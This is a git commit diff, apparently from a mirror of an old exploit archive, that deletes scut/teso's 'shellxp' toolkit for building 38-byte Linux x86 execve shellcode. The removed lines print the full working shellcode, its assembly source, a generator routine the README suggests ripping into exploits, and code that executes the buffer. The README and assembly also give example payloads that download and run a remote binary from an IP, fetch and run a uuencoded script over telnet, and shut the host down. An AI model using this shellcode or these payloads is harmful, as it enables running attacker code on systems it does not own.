From 9da824575b3f4496431691bdb3f6ce45c601accc Mon Sep 17 00:00:00 2001 From: SkyperTHC Date: Wed, 4 Mar 2026 16:56:48 +0000 Subject: packetstorm sync --- other/shell/README | 38 -------------- other/shell/sc.s | 51 ------------------- other/shell/shellcode.c | 46 ----------------- other/shell/shellxp | Bin 90748 -> 0 bytes other/shell/shellxp.c | 130 ------------------------------------------------ 5 files changed, 265 deletions(-) delete mode 100644 other/shell/README delete mode 100644 other/shell/sc.s delete mode 100644 other/shell/shellcode.c delete mode 100755 other/shell/shellxp delete mode 100644 other/shell/shellxp.c (limited to 'other/shell') diff --git a/other/shell/README b/other/shell/README deleted file mode 100644 index b6fbeaa..0000000 --- a/other/shell/README +++ /dev/null @@ -1,38 +0,0 @@ - -gcc -o shellxp shellxp.c - -./shellxp commands ... - -or to exec the generated shellcode - -./shellxp exec commands ... - - -either rip the sc_build routine into your exploits to directly create the -shellcode on the fly, or prepare it. - -some examples: - -./shellxp /bin/sh -c "lynx -source 1.1.1.1/a>a;chmod +x a;./a" -./shellxp /bin/sh -c "echo haha > /tmp/owned" -./shellxp /sbin/shutdown -h now - -or especially fancy ;-) - -./shellxp /bin/sh -c "((echo GET /test/ HTTP/1.0;echo;sleep 5)|telnet www.foo.org 80)|uudecode;/tmp/run.sh" - - (where /test/index.html is an uuencoded file that will uudecode to an executeable /tmp/run.sh file) - modify the "sleep 5" to an appropiate value to allow the file to get retrieved :-) - -(imagine some other fancy stuff in here :-) -... - --scut/teso. - - -to modify the shellcode, use: - -gcc -o shellcode shellcode.c sc.s -./shellcode <-- will dump the code -./shellcode foo <-- will dump and run the code - diff --git a/other/shell/sc.s b/other/shell/sc.s deleted file mode 100644 index 6133b3e..0000000 --- a/other/shell/sc.s +++ /dev/null @@ -1,51 +0,0 @@ -/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */ - -.data -.globl cbegin -.globl cend - -cbegin: - - jmp jahead - -docall: - pop %edi - - movl %edi, %esp - not %sp /* build new stack frame */ - - xorl %eax, %eax /* read number of arguments */ - movb (%edi), %al - inc %edi - -decl1: push %edi -decl2: scasb /* search delim bytes */ - jnz decl2 - - movb %ah, -1(%edi) - dec %eax - jnz decl1 - - pop %ebx /* pathname */ - push %ebx - - push %eax - pop %edx /* esp -= 4, edx = &envp[] = NULL */ - movl %esp, %ecx /* ecx = &argv[] */ - - movb $11, %al - int $0x80 - -jahead: call docall - -/* reverse order arguments */ -.byte 0x03 /* number of arguments */ -.ascii "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a" -.byte 0x03 -.ascii "-c" -.byte 0x02 -.ascii "/bin/sh" -.byte 0x01 - -cend: - diff --git a/other/shell/shellcode.c b/other/shell/shellcode.c deleted file mode 100644 index 1fc68cf..0000000 --- a/other/shell/shellcode.c +++ /dev/null @@ -1,46 +0,0 @@ -/* shellcode extraction utility, - * by type / teso, small mods by scut. - */ - - -#include -#include - -extern void cbegin (); -extern void cend (); - - -int -main (int argc, char *argv[]) -{ - int i; - unsigned char * buf = (unsigned char *) cbegin; - unsigned char ex_buf[1024]; - - - printf ("/* %d byte shellcode */\n", cend - cbegin); - printf ("\""); - for (i = 0 ; buf < (unsigned char *) cend; ++buf) { - - printf ("\\x%02x", *buf & 0xff); - - if (++i >= 12) { - i = 0; - printf ("\"\n\""); - } - } - printf ("\";\n"); - - printf("\n"); - - if (argc > 1) { - printf ("%02x\n", ((unsigned char *) cbegin)[0]); - printf ("%02x\n", ex_buf[0]); - memcpy (ex_buf, cbegin, cend - cbegin); - printf ("%02x\n", ex_buf[0]); - ((void (*)()) &ex_buf)(); - } - - exit (EXIT_SUCCESS); -} - diff --git a/other/shell/shellxp b/other/shell/shellxp deleted file mode 100755 index c52acb2..0000000 Binary files a/other/shell/shellxp and /dev/null differ diff --git a/other/shell/shellxp.c b/other/shell/shellxp.c deleted file mode 100644 index 4d5916b..0000000 --- a/other/shell/shellxp.c +++ /dev/null @@ -1,130 +0,0 @@ - -#include -#include -#include -#include -#include - - -/* 38 byte x86/linux PIC arbitrary execute shellcode - scut / teso - */ -unsigned char shellcode[] = - "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07" - "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b" - "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff" - "\xff\xff"; - -static int sc_build (unsigned char *target, size_t target_len, - unsigned char *shellcode, char **argv); - -void hexdump (unsigned char *cbegin, unsigned char *cend); - - -static int -sc_build (unsigned char *target, size_t target_len, unsigned char *shellcode, - char **argv) -{ - int i; - size_t tl_orig = target_len; - - - if (strlen (shellcode) >= (target_len - 1)) - return (-1); - - memcpy (target, shellcode, strlen (shellcode)); - target += strlen (shellcode); - target_len -= strlen (shellcode); - - for (i = 0 ; argv[i] != NULL ; ++i) - ; - - /* set argument count - */ - target[0] = (unsigned char) i; - target++; - target_len--; - - for ( ; i > 0 ; ) { - i -= 1; - - if (strlen (argv[i]) >= target_len) - return (-1); - - printf ("[%3d/%3d] adding (%2d): %s\n", - (tl_orig - target_len), tl_orig, - strlen (argv[i]), argv[i]); - - memcpy (target, argv[i], strlen (argv[i])); - target += strlen (argv[i]); - target_len -= strlen (argv[i]); - - target[0] = (unsigned char) (i + 1); - target++; - target_len -= 1; - } - - return (tl_orig - target_len); -} - - -void -hexdump (unsigned char *cbegin, unsigned char *cend) -{ - int i; - unsigned char * buf = cbegin; - - - printf ("/* %d byte shellcode */\n", cend - cbegin); - printf ("\""); - - for (i = 0 ; buf < cend; ++buf) { - - printf ("\\x%02x", *buf & 0xff); - - if (++i >= 12) { - i = 0; - printf ("\"\n\""); - } - } - printf ("\";\n\n"); -} - - -int -main (int argc, char *argv[]) -{ - int n; - unsigned char tbuf[2048]; - void (* tbuf_f)(void) = (void *) tbuf; - - - printf ("build exploit shellcode\n"); - printf ("-scut / teso.\n\n"); - - if (argc < 2) { - printf ("usage: %s [exec] commands ...\n\n", - argv[0]); - - exit (EXIT_FAILURE); - } - - printf ("constructing shellcode...\n\n"); - memset (tbuf, '\x00', sizeof (tbuf)); - if (strcmp (argv[1], "exec") == 0) - n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[2]); - else - n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[1]); - if (n == -1) { - printf ("failed to build it.\n"); - exit (EXIT_FAILURE); - } - - printf ("shellcode size: %d bytes\n\n", n); - hexdump (tbuf, tbuf + n); - - if (strcmp (argv[1], "exec") == 0) - tbuf_f (); - - exit (EXIT_SUCCESS); -} - -- cgit v1.3